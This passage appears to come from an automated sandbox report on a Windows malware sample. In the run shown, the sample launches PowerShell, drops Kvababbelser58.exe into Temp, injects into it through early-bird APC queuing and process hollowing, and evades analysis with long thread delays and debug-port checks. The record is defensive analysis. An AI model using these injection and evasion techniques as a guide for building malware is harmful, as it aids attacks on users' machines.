      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08C824F6 push edi; iretd 2_2_08C824A9
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08C86A3B push ss; ret 2_2_08C86A42
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08C843CD push ds; ret 2_2_08C843D8
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08C86DA3 push cx; ret 2_2_08C86DB6
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08C8391A push es; iretd 2_2_08C8391C
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeCode function: 7_2_0166391A push es; iretd 7_2_0166391C
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeCode function: 7_2_016643CD push ds; ret 7_2_016643D8
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeCode function: 7_2_01666DA3 push cx; ret 7_2_01666DB6
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeCode function: 7_2_01666A3B push ss; ret 7_2_01666A42
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeCode function: 7_2_016624F6 push edi; iretd 7_2_016624A9
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeCode function: 7_2_01666CF4 push es; iretd 7_2_01666CF5
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Loading BitLocker PowerShell Module
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Switches to a custom stack to bypass stack traces
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeAPI/Special instruction interceptor: Address: 1CD8EED
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7718Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1887Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3024Thread sleep time: -9223372036854770s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe TID: 3312Thread sleep time: -200000s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeLast function: Thread delayed
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeCode function: 0_2_004065C7 FindFirstFileW,FindClose,0_2_004065C7
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeCode function: 0_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405996
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: powershell.exe, 00000002.00000002.2060046848.0000000004B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000002.00000002.2060046848.00000000052FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter@\
      Source: powershell.exe, 00000002.00000002.2060046848.0000000004B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000002.00000002.2060046848.00000000052FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter@\
      Source: powershell.exe, 00000002.00000002.2060046848.00000000052FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter@\
      Source: Kvababbelser58.exe, 00000007.00000003.2343169499.000000000549D000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000002.2644866280.0000000005448000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2332425040.000000000549D000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000002.2644866280.000000000549D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: powershell.exe, 00000002.00000002.2060046848.0000000004B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeAPI call chain: ExitProcess graph end nodegraph_0-3771
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeAPI call chain: ExitProcess graph end nodegraph_0-3763
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_02C877F9 LdrInitializeThunk,2_2_02C877F9
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Early bird code injection technique detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeJump to behavior
      Queues an APC in another process (thread injection)
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeJump to behavior
      Sample uses process hollowing technique
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe base address: 400000Jump to behavior
      Writes to foreign memory regions
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe base: 1660000Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe "C:\Users\user~1\AppData\Local\Temp\Kvababbelser58.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
